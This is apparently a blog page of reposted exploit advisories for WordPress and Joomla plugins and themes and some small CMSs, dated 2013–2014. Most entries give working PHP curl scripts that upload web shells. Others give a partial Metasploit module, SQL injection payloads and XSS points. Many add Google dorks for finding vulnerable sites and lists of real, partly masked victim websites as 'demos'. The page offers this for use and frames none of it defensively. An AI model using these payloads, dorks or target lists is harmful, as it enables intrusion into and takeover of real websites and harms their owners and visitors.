Exploits

WordPress amerisale-re Remote file Upload Vulnerability

By |February 8th, 2014|

Exploit Title : WordPress amerisale-re Plugin Remote Shell Upload
Exploit Author : T3rm!nat0r5
Google Dork : inurl:/wp-content/plugins/amerisale-re
Vendor Homepage : http://wordpress.org/
Date : 2014/01/30
Tested on : Windows 8 , Linux
This module requires Metasploit: http//metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework

CoDE:

require ‘msf/core’
class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => ‘WordPress amerisale-re Plugin Remote
Shell Upload’,
‘Description’ => %q{
This module exploits an arbitrary […]

Comments Off on WordPress amerisale-re Remote file Upload Vulnerability

WordPress Dandelion Theme Shell Upload Vulnerability

By |February 8th, 2014|

Exploit Title: WordPress Dandelion Theme Shell Upload Vulnerability
Google Dork: inurl:/wp-content/themes/dandelion/
Date: 31/01/2014
Exploit Author: TheBlackMonster (Marouane)
Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628
Software Link: Not Available
Version: Web Application
Tested on: Mozilla, Chrome, Opera -> Windows & Linux

CoDE:

< ? php $uploadfile="yourfile.php"; $ch = curl_init("http://127.0.0.1:8080/wp-content/themes/dandelion/functions/upload-handler.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
? >

File Access :

http://127.0.0.1:8080/uploads/[years]/[month]/your_shell.php

Comments Off on WordPress Dandelion Theme Shell Upload Vulnerability
  • wordpress exploits, webapps exploits, wordpress vulnerability, 1337mir
    Permalink wordpress exploits, webapps exploits, wordpress vulnerability, 1337mirGallery

    WordPress Blogfolio Theme Arbitrary File Upload Vulnerability

WordPress Blogfolio Theme Arbitrary File Upload Vulnerability

By |January 3rd, 2014|

Title : WordPress Blogfolio Theme Arbitrary File Upload Vulnerability
Author : eX-Sh1Ne
Date : 23/11/2013
Category : Web Applications
Type : PHP
Vendor : http://themify.me/
Download : http://themify.me/themes/blogfolio
Tested : Mozila, Chrome-> Windows
Vulnerabillity : Arbitrary File Upload
Dork : inurl:wp-content/themes/blogfolio/

Exploit:
< ? p h p $uploadfile=”sh1ne.php”; $ch = curl_init(“http://127.0.0.1/wp-content/themes/blogfolio/themify/themify-ajax.php?upload=1″); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘Filedata’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
Shell Access
http://127.0.0.1/[PATH]/wp-content/themes/blogfolio/uploads/sh1ne.php
or
http://127.0.0.1/[PATH]/wp-content/uploads/[years]/[month]/ > […]

Comments Off on WordPress Blogfolio Theme Arbitrary File Upload Vulnerability
  • wordpress exploits, webapps exploits, wordpress vulnerability, 1337mir
    Permalink wordpress exploits, webapps exploits, wordpress vulnerability, 1337mirGallery

    WordPress dzs-videogallery Plugins Remote File Upload Vulnerability

WordPress dzs-videogallery Plugins Remote File Upload Vulnerability

By |January 3rd, 2014|

Exploit Title: WordPress dzs-videogallery Plugins Remote File Upload Vulnerability
Author: iskorpitx
Date: 22/11/2013
Vendor Homepage: http://digitalzoomstudio.net
Themes Link: http://digitalzoomstudio.net/docs/wpvideogallery/
Infected File: upload.php
Category: webapps
Google dork: inurl:/wp-content/plugins/dzs-videogallery/
Tested on : Windows/Linux
< ? p h p $uploadfile=””; $ch = curl_init(“http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php”); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘file_field’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch); curl_close($ch);
print “$postResult”;
?>
uploaded file:
http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload/upload.html

Comments Off on WordPress dzs-videogallery Plugins Remote File Upload Vulnerability
  • WordPress-Complete-Gallery-Manager-3.3.3-File-Upload-Vulnerability
    Permalink WordPress-Complete-Gallery-Manager-3.3.3-File-Upload-VulnerabilityGallery

    WP page-flip-image-gallery plugins Remote File Upload Vulnerability

WP page-flip-image-gallery plugins Remote File Upload Vulnerability

By |January 3rd, 2014|

Exploit Title: WordPress page-flip-image-gallery plugins Remote File Upload Vulnerability
Author: Ashiyane Digital Security Team
Date: 12/06/2013
Vendor Homepage: http://pageflipgallery.com
Software Link : http://downloads.wordpress.org/plugin/page-flip-image-gallery.zip
Google dork: inurl:/wp-content/plugins/page-flip-image-gallery/
Tested on: Windows/Linux

1)Exploit :
< ? p h p $ uploadfile=”file.php”; $ ch = curl_init(” http://127.0.0.1/wp-content/plugins/page-flip-image-gallery/upload.php”); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘orange_themes’=>”@$uploadfile”)); curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print “$postResult”;
?>
2) Exploit demo :
http://arcticpackXging.com/wp-content/plugins/page-flip-image-gallery/upload.php
http://www.panvXlkargroup.org/wp-content/plugins/page-flip-image-gallery/upload.php
http://www.jamXma.it/wp-content/plugins/page-flip-image-gallery/upload.php
http://www.icipiXi.ie/suiomh/wp-content/plugins/page-flip-image-gallery/upload.php
uploaded file:
http://[Target]/wp-content/uploads/file.php

Comments Off on WP page-flip-image-gallery plugins Remote File Upload Vulnerability

Imaweb SQL injection Vulnerability

By |December 30th, 2013|

Exploit Title : imaweb SQL injection vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : http://www.imaweb.fr
Google Dork : intext:Réalisation du site Internet par Imaweb
Date: 2013-12-25
Tested on: Windows 7
discovered by : ACC3SS

Location :
localhost/public/index.php?act=photo_afficher&code=pub_phototheque2&num=[Sql
Injection]
Demo:
http://www.avajaXXn.fr/public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,version(
),4,5,6,7–

http://www.auzXay.fr//public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,version()
,4,5,6,7–

http://www.roumeXgoux.fr/public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,versio
n(),4,5,6,7–

http://www.oxygXeneinsertion.fr/public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2
,version(),4,5,6,7–

http://www.petXersbach.fr//public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,vers
ion(),4,5,6,7–

Comments Off on Imaweb SQL injection Vulnerability

joomla com_joomleague execute arbitrary PHP code Exploit

By |November 4th, 2013|

Exploit Title: joomla com_joomleague execute arbitrary PHP code Exploit
Google Dork: inurl:com_joomleague
Date: [01-11-2013]
Exploit Author: wantexz
Vendor Homepage: http://www.joomleague.net/
Software Link: http://www.joomleague.net/index.php?option=com_jdownloads&Itemid=104&view=viewdownload&catid=2359&cid=242&lang=en
Version: com_joomleague
Tested on: [wantexz]
CVE :
target tested: http://badminton.loiret.free.fr//components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php

POC: 
<?php
$options = getopt(‘u:f:’);

if(!isset($options[‘u’], $options[‘f’]))
die(“\n Usage example: php IDC.php -u http://target.com/ -f IDC.php\n
-u http://target.com/ The full path to Joomla!
-f IDC.php The name of the file to create.\n”);

$url = $options[‘u’];
$file = $options[‘f’];
$shell = […]

Comments Off on joomla com_joomleague execute arbitrary PHP code Exploit

Catmis Sql Injection Vulnerability

By |November 4th, 2013|

Exploit Title : Catmis Sql Injection Vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : http://code.google.com/p/catmis/
Google Dork : inurl:blog/blog.php?blogId=1 inurl:categoryId=
Date: 2013/11/102

Tested on: Windows 7 , Linux
——————————————————————-
Exploit : Sql Injection
Location : [Target]/www.scienceathome.org/blog/blog.php?blogId=1&categoryId=-1&page=[Sql Injection]
Proof:
http://www.scienceathoXXme.org/blog/blog.php?blogId=1&categoryId=-1&page=’
https://www.vidensbXXroend.dk/blog/blog.php?blogId=1&categoryId=-1&page=’
http://www.geigerXXrecords.dk/blog/blog.php?blogId=1&categoryId=3&page=’
http://solikedorXXian.dk/blog/blog.php?blogId=1&categoryId=1&page=’
http://www.krXweb.dk/blog/blog.php?blogId=1&categoryId=1&page=’

Comments Off on Catmis Sql Injection Vulnerability

WordPress fgallery plus Plugin Xss vulnerabilities

By |October 10th, 2013|

Exploit Title : WordPress fgallery plus Plugin Xss vulnerabilities
Author : Iranian Exploit DataBase
Discovered By : IeDb
Email : [email protected]
Home : http://iedb.ir – http://iedb.ir/acc
Software Link : http://wordpress.org/
Security Risk : High
Tested on : Linux
Dork : inurl:/plugins/fgallery_plus/
Exploit :
http://sXXom/wp-content/plugins/fgallery_plus/fim_rss.php?album=[Xss]
Dem0 :

http://alXXdk/wp-content/plugins/fgallery_plus/fim_rss.php?album=3[xss]
http://www.quiolikeoooh.com/quio/wp-content/plugins/fgallery/fim_rss.php?album=3[xss]
Tnx To : TaK.FaNaR – l4tr0d3ctism – r3d_s0urc3 – Bl4ck M4n – Medrik – Dj.TiniVini –
dr.koderz – z3r0 – Mr Zer0
B3hz4d […]

Comments Off on WordPress fgallery plus Plugin Xss vulnerabilities

WordPress Lazy SEO plugin Shell Upload Vulnerability

By |October 10th, 2013|

exploit Title : WordPress Lazy SEO plugin Shell Upload Vulnerability
Exploit Author : Ashiyane Digital Security Team
Discovered By : ACC3SS
Google Dork: : inurl:/wp-content/plugins/lazy-seo/
Date: 2013/09/21
Vendor Homepage : http://wordpress.org/plugins/lazy-seo
Software Link : http://downloads.wordpress.org/plugin/lazy-seo.1.1.9.zip
Version : 1.1.9
Tested on: Windows

Location:
Site/wp-content/plugins/lazy-seo/lazyseo.php
1.Go to address : Site/wp-content/plugins/lazy-seo/lazyseo.php
2.Click on Browse…
3.Select Shell Code
3.Complete the fields
4.Press Enter
5.Shell Address : wp-content/plugins/lazy-seo/Shell.php

Demo:
http://www.dXus.com/wp-content/plugins/lazy-seo/lazyseo.php
http://noteclX.com/wp-content/plugins/lazy-seo/lazyseo.php

Comments Off on WordPress Lazy SEO plugin Shell Upload Vulnerability